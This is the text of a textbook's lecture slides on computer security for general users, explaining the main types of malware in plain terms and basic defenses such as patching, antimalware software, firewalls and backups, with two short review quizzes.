Security

Awareness, 6e
Module 3: Computer Security

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 1
 Icebreaker
Would you rather this or that…

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 2
 Module Objectives
3.1: Define malware
3.2: Identify the different types of malware attacks
3.3: Explain how managing patches and running antimalware software can
provide a defense
3.4: Explain what a firewall does
3.5: Describe how to stop ransomware

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 3
 Introduction
• Protecting personal computers is challenging
• Many different types of attacks exist today
– Attackers are constantly modifying attacks and creating new ones
– “Zero-day attacks” use previously unknown vulnerabilities, giving zero days
of advanced warning
• No single defensive program exists
– Several different defenses must be in place
• In this module, you will learn about computer security

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 4
 Malware Attacks (1 of 2)
• Malware (malicious software)
– Software that enters a computer system without the owner’s knowledge or
consent
– Performs unwanted and usually harmful action
– The number of instances of malware is staggering
– Malware continues to evolve to avoid detection and successfully attack
computers

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 5
 Malware Attacks (2 of 2)
• Method of classifying the various types of malware is by using the
primary action that the malware performs:
– Kidnap
– Eavesdrop
– Masquerade
– Serve as a launchpad
– Sidestep

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 6
 Kidnap
Kidnapping is a crime that involves capturing a person and then holding
them captive until a ransom is paid for their release.

Ransomware is malicious software that “kidnaps” a user’s computer and

holds it “hostage” until a ransom is paid.

There are two types of ransomware:

• Blocker ransomware
• Cryptomalware

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 7
 Blocker Ransomware (1 of 5)
• Earliest form of ransomware
• When reaching a system, the ransomware infects the computer and
manipulates its operating system
• It blocks all normal access to the device
• Rebooting over and over has no impact
• Typically, a message on the user’s screen appears pretending to be
from a reputable third party, such as a law enforcement agency
– Usually provides a “valid” reason for blocking user access

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 8
 Blocker Ransomware (2 of 5)

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 9
 Blocker Ransomware (3 of 5)
• Another variation pretends to come from a reputable software vendor
with various fictitious warnings
– The software has expired
– The computer has a problem such as imminent hard drive failure
– The computer has a malware infection
• Users are told that they must immediately renew their license online

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 10
 Blocker Ransomware (4 of 5)

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 11
 Blocker Ransomware (5 of 5)
• Attackers today often drop the pretense and simply block the user’s
computer and demand a fee
• For individuals, the ransom is usually around $500
• For enterprises, the ransom can be tens or hundreds of millions of
dollars
• The top four ransomware targets are education, retail, business and
professional services, and government

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 12
 Cryptomalware (1 of 3)
• A recent and more malicious form of ransomware
• Encrypts some or all the files on the device so they cannot be opened
• Encrypting only some files helps the malware to evade detection
• A message contains a fee that must be paid to receive a key
– Often there is an urgency in that the fee increases every few hours or days
– If the ransom is not paid by a certain deadline, the key can never be
purchased

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 13
 Cryptomalware (2 of 3)

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 14
 Cryptomalware (3 of 3)
• Today, a decryption tool is delivered 99% of the time after the ransom is
paid
– The key only works about 96% of the time due to some variants corrupt the
data
• New variants encrypt all files on any network or device connected to that
computer, including cloud-based data repositories

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 15
 Eavesdrop
A category of malware that eavesdrops or secretly listens to its victims.

Two common types are:

• Keyloggers
• Spyware

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 16
 Keylogger (1 of 4)
• A software program or a small hardware device that silently captures
and stores each keystroke a user types on the computer’s keyboard
• Captures passwords, credit card numbers, or personal information
• Software keylogger are programs either installed on the computer or
installed remotely
– Hides itself from detection by the user
– Can make screen captures
– Can silently turn on the computer’s web camera to record images of the
user

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 17
 Keylogger (2 of 4)

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 18
 Keylogger (3 of 4)
• Hardware keylogger
– Hardware devices installed between computer keyboard and USB port
– Often used on computers in public places such as libraries and computer
labs
– Resembles an ordinary keyboard connection
– Beyond the reach of antimalware scanning software
– Threat actor must install and then return to physically remove the device in
order to access the information

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 19
 Keylogger (4 of 4)

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 20
 Spyware (1 of 2)
• Tracking software that is deployed without the consent or control of the
user.
• Uses the computer’s resources, including programs already installed on
the computer
• Collects and distributes personal or sensitive information
• There are spyware monitoring tools that can help parents keep track of
the online activities of their children

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 21
 Spyware (2 of 2)
Table 3-1 Technologies used by spyware

Technology Description Impact

Automatic download Used to download and install software without the Could install unauthorized applications
software user’s interaction
Passive tracking Used to gather information about user activities Could collect private information such
technologies without installing any software as websites a user has visited
System modifying Modifies or changes user configurations, such as Changes configurations to settings that
software the web browser home page or search page, default the user did not approve
media player, or lower-level system functions
Tracking software Used to monitor user behavior or gather information Could collect personal information that
about the user, sometimes including personally can be shared widely or stolen,
identifiable or other sensitive information resulting in fraud or identity theft

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 22
 Masquerade
• Malware that attempts to deceive the user and hide its true identity by
“masquerading” or pretending to be something else
• Three types of masquerading malware:
– Potentially unwanted programs (PUPs)
– Trojans
– Remote access Trojans (RATs)

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 23
 Potentially Unwanted Program (PUP) (1 of 3)
• A broad category of software that is usually more annoying than
malicious
– Software the user does not want on their computer
– Often installed along with other programs as a result of overlooking the
default installation options
– May include software that is preinstalled on a new computer or smartphone
(called “bloatware”) and cannot easily be removed
– Many PUPs display advertising through pop-up windows that obstruct
content

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 24
Potentially Unwanted Program (PUP) (2 of 3)

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 25
Potentially Unwanted Program (PUP) (3 of 3)

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 26
 Trojan
• An executable program that masquerades as performing a benign
activity but also does something malicious
• Similar concept to the large, hollow, wooden horse used by the Greeks
to win the Trojan War
• User downloads a useful program like a calendar, yet this installation
also installs malware that
– scans the system for personal information
– Connects through the network to a remote system
– Transmits that information to the attacker

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 27
 Remote Access Trojan (RAT)
• A special type of Trojan that also gives the threat agent unauthorized
remote access to the victim’s computer
• Uses specially configured communication protocols that allow the threat
agent unrestricted access
• Attacker can change computer settings, browse and copy files, and use
the computer to access other computers connected to the network

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 28
 Launchpad (1 of 2)
• A launchpad is an area on which a rocket stands and serves as a means
to catapult the rocket into space
• In a similar fashion, this category of malware infects a computer and
uses the infected computer as a launchpad to send attacks to other
computers
• The types of attacks include a
– Virus
– Worm
– Bot

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 29
 Launchpad (2 of 2)

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 30
 Virus (1 of 5)
Two types of viruses: file-based virus and fileless virus

• File-based virus
– Remarkably similar to a biological virus
– Malicious computer code attached to a file
– When the program or data file is launched, the virus
 unloads a payload to perform a malicious action
 reproduces itself by inserting its code into another file on the same computer

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 31
 Virus (2 of 5)
• This virus can only replicate on host computer
– Cannot spread between computers without user action
– Must rely on the actions of users to spread to other computers
– Spread by a user transferring infected files to other devices
– The virus must have two carriers:
 a file to which it attaches
 a human to transport it to other computers

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 32
 Virus (3 of 5)
Table 3-2 Windows file types that can be infected

File extension Description

.docx or .xlsx Microsoft Office user documents
.exe Executable program file
.msi Microsoft installer file
.msp Windows installer patch file
.scr Windows screen saver
.cpl Windows Control Panel file
.msc Microsoft Management Console file
.wsf Windows script file
.ps1 Windows PowerShell script

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 33
 Virus (4 of 5)
• Fileless virus
– Does not attach itself to a file
– Takes advantage of native services and processes that are part of the
operating system
– The native services are called living-off-the-land binaries (LOLBins)
 Examples: .EXE, .DLL, and .VBS files
– The malicious code is loaded directly into the computer’s random access
memory (RAM) through the LOLBins and then executed

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 34
 Virus (5 of 5)
Name Description
PowerShell A cross-platform and open-source task automation and configuration
management framework
Windows Management A Microsoft standard for accessing management information about devices
Instrumentation (WMI)
.NET Framework A free, cross-platform, open-source developer platform for building
different types of applications
Macro A series of instructions that can be grouped together as a single command
to automate a complex set of tasks or a repeated series of tasks and can
be written by using a macro scripting language, such as Visual Basic for
Applications (VBA), and is stored within the user document (such as in an
Excel .xlsx worksheet or Word .docx file)

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 35
 Worm (1 of 3)
• Worms (sometimes called network viruses)
– Malicious program that uses a computer network to replicate
– Enters a computer through the network
– Takes advantage of a vulnerability in a program or an operating system
– Searches for another computer with same vulnerability
– Sends copies of itself over the network

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 36
 Worm (2 of 3)
• On of the first wide-scale worms occurred in 1988, affecting 10% of the
devices connected to the Internet at that time
• Early worms were designed to spread quickly but not corrupt the
systems
– They slowed down the network due to replicating so quickly
• Today’s worms can leave behind a payload and cause harm
– Deleting files on the computer
– Allowing the computer to be remotely controlled by an attacker

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 37
 Worm (3 of 3)
Virus vs. Worm

• Similarity
– Both are automatically self-replicating
• Difference
– Where they replicate
 Virus self-replicates on the host computer
 Worm self-replicates between computers

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 38
 Bot (1 of 3)
• Popular payload of malware that allows the infected computer to be
placed under the remote control of an attacker to launch attacks
– The infected ‘‘robot’’ computer is known as a bot or zombie
– Botnet
 Hundreds, thousands, or millions of bot computers gathered in a logical
computer network
– Bot herder (attacker) controls the botnet

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 39
 Bot (2 of 3)
Table 3-4 Uses of botnets
Type of attack Description
Spamming Botnets are widely recognized as the primary source of spam email. A botnet consisting
of thousands of bots enables an attacker to send massive amounts of spam.
Spreading malware Botnets can be used to spread malware and create new bots and botnets. Bots can
download and execute a file sent by the attacker.
Ad fraud Threat actors earn money by generating a high number of “clicks” on advertisements at
targeted websites, using a bot to mimic the selections of a user.
Mining cryptocurrencies Also called “cryptomining,” this is a process in which transactions for various forms of
cryptocurrency are verified, earning the “miner” a monetary reward. Botnets combine the
resources of millions of bots for mining cryptocurrencies.

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 40
 Bot (3 of 3)
Bot herders can instruct bots by a Command & Control structure (C&C)
• Bots can automatically sign in to a website owned by the bot herder
• Bots can sign in to a third-party website
• Bots can receive instructions via blogs, posts on Twitter, or notes posted
on Facebook
• Bot herders can use a “dead drop” C&C mechanism
– Creates a Google Gmail email account and drafts an unsent email
– Bots log in to the email account and read the draft
– The draft is never sent so there is no record of it

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 41
 Sidestep
• Malware that attempts to help malware “sidestep” or evade detection
– Backdoor
– Logic bomb
– Rootkit

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 42
 Backdoor
Backdoor is a software code that gives access to a computer, a program or
service that circumvents normal security protections
 Allows the attacker to return at a later time and bypass security settings
 Developers often create a legitimate backdoor that allows them to access a
program or device regularly without need for passwords or security approvals
 If not removed when the application is finalized, attackers can use them to
bypass security

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 43
 Logic Bomb
A logic bomb is computer code that is added to a legitimate program but
lies dormant and evades detection until triggered by a specific logical event
– Once triggered, the program deletes data or performs other malicious
activities
– Embedded in very large computer programs, so they are difficult to detect
– A trusted employee can easily insert a few lines of computer code without
anyone detecting it
– Most often a logic bomb is based on a specific time or date, such as 90
days after an employee was terminated from the job

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 44
 Rootkits
Rootkit is malware that can hide its presence and the presence of other
malware on the computer.
– Access “lower layers” of the operating system or use undocumented
functions to make alterations
– Can be undetectable by the operating system and common antimalware
scanning software
– The risks are lower today due to protections built into operating systems

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 45
 Knowledge Check Activity 3-1
Which two statements are correct?

1. The two types of viruses are a file-based virus and a fileless virus.
2. A keylogger can be a software program or a small hardware device.
3. When hundreds, thousands, or even millions of bot computers are
gathered into a logical computer network, they create a “swarm.”

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 46
 Knowledge Check Activity 3-1: Answer
Which two statements are correct?

The two types of viruses are a file-based virus and a fileless virus.

A keylogger can be a software program or a small hardware device.

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 47
 Computer Defenses
• No single defense can be implemented to protect a computer
• Defenses a user should implement
– Managing patches
– Running antimalware software
– Examining firewalls
– Stopping ransomware

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 48
 Managing Patches (1 of 3)
• Due to the increased complexity of operating systems, unintentional
vulnerabilities were introduced that could be exploited by attackers
• To address the vulnerabilities and to provide ongoing additional features,
operating system vendors deploy updates to users’ computers through
an automatic online update service
• Software updates to address a security issue are known as a patch
• Promptly installing patches once they are available is the most important
step to protecting your computer

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 49
 Managing Patches (2 of 3)
Table 3-5 Microsoft operating system updates
Name Release cycle Description
Feature updates Annually These updates add new features to the operating
system.
Quality updates Second Tuesday of each Quality updates deliver both security and non-
month, although they can security fixes and include security updates, critical
be released at any time updates, servicing stack updates, and driver
updates.
Insider previews Random These “builds” are made available to interested users
during the development process of new features that
will be shipped in the next feature update.

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 50
 Managing Patches (3 of 3)

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 51
 Running Antimalware Software
Antimalware software is software that can combat various malware attacks.

The most common types are

• antivirus (AV) software
• comprehensive antimalware software.

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 52
 Antivirus (AV) Software
• Antivirus software
– Scans a computer for infections
– Monitors computer activity
– Examines new documents that might contain a virus
– Works by matching to known virus “signatures”
– The AV vendor must constantly update the signature file
– Due to the many types of malware, AV software is no longer considered a
“magic bullet” for providing complete protection on a computer

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 53
 Comprehensive Antimalware Software (1 of 2)
Comprehensive Antimalware software looks for virus as well as providing:
• Intrusion prevention—analyses information arriving from a network and
blocks potential threats before they enter a computer
• Reputation protection—it can classify software application files as
“dangerous,” “risky,” or “safe” based on their attributes
• Behavioral protection—monitors applications for suspicious behavior and
automatically blocks the software if necessary

Both Microsoft Windows and Apple macOS have built-in comprehensive

antimalware software.

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 54
Comprehensive Antimalware Software (2 of 2)

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 55
 Examining Firewalls (1 of 3)
A computer firewall (a packet filter) is designed to limit the spread of
malware. There a two types of firewalls.

• Software-based personal firewall

– All modern operating systems include an application firewall
– Designed to prevent malware from entering a computer
– Examines incoming data from the Internet or local network
– User can create an “opening” in the firewall just for an approved program to
communicate across a local network or an Internet server

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 56
 Examining Firewalls (2 of 3)

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 57
 Examining Firewalls (3 of 3)
• Hardware-based network firewall
– Designed to protect an entire network
– Usually located at the “edge” of the network as the first line of defense
Table 3-6 Personal and network firewalls

Function Personal firewall Network firewall

Location Runs on a single computer Located on edge of the network
Scope of protection Protects only the computer on Protects all devices connected to the
which it is installed network
Type Software that runs on computer Part of a Wi-Fi modem or separate
hardware device
Filtering Based on programs running on the Provides a sophisticated range of
computer filtering mechanisms

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 58
 Stopping Ransomware (1 of 2)
The devices against ransomware include unplugging devices and creating
data backups.

• Unplug devices
– If a remote storage device is “mounted” on the local computer and can be
freely accessed or displays a drive letter (like “D:”), then those files are at
risk
– If a cloud storage repository is configured so that files are automatically
synced to the cloud storage, then those files are at risk

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 59
 Stopping Ransomware (2 of 2)
• The solution is to “air gap” or physically isolate the computer from the
storage device
– External USB storage device—unplug it when not being used
– Secondary hard disk drive—“unmount” it when it is not needed
– Network-attached storage (NAS)—create a new share (“admin”) with a
strong username and password and log in and out as needed
– Cloud storage—consider turning off automatic synchronization and choose
to log into cloud storage via a web browser that requires a username and
password

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 60
 Creating Data Backups (1 of 4)
• Copy data from computer’s hard drive onto other digital media
– Store backup in a secure location
• Backups can restore computer to properly functioning state
• Can also protect against:
– Hardware malfunctions
– User error
– Software corruption
– Natural disasters

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 61
 Creating Data Backups (2 of 4)
• Continuous Cloud Backups
– One that is performed continually without an intervention by the user
– Software monitors what files have changed and automatically updates the
backed-up files with the most recent versions
– These backups are stored online

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 62
 Creating Data Backups (3 of 4)
• Cloud-based services are available
– Automated continuous backup
– Universal access
– Optional program file backup
– Delayed deletion
– Online or hardware-based restore
• Advantage of online continuous backups:
– They are performed automatically and stored at a remote location

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 63
 Creating Data Backups (4 of 4)
• Scheduled Local Backups—performed intentionally by the user and
stored locally
• Backup strategy
– What data should be backed up?—little need to back up programs
– What media should be used?—consider a portable USB hard drive
– Where to store the backup?—stored offsite
– How frequently the backup should be performed?—once per day if
computer is being used frequently, else twice per week

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 64
 Knowledge Check Activity 3-2
Which two statements are correct?

1. Installing AV is the most important step to protecting your computer.

2. It is recommended that users have both a personal firewall and some
type of hardware firewall.
3. The most comprehensive backup solution for most users is a
continuous cloud backup.

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 65
 Knowledge Check Activity 3-2: Answer
Which two statements are correct?

It is recommended that users have both a personal firewall and some

type of hardware firewall.

The most comprehensive backup solution for most users is a

continuous cloud backup.

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 66
 Summary
Click the link to review the objectives for this presentation.
Link to Objectives

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 67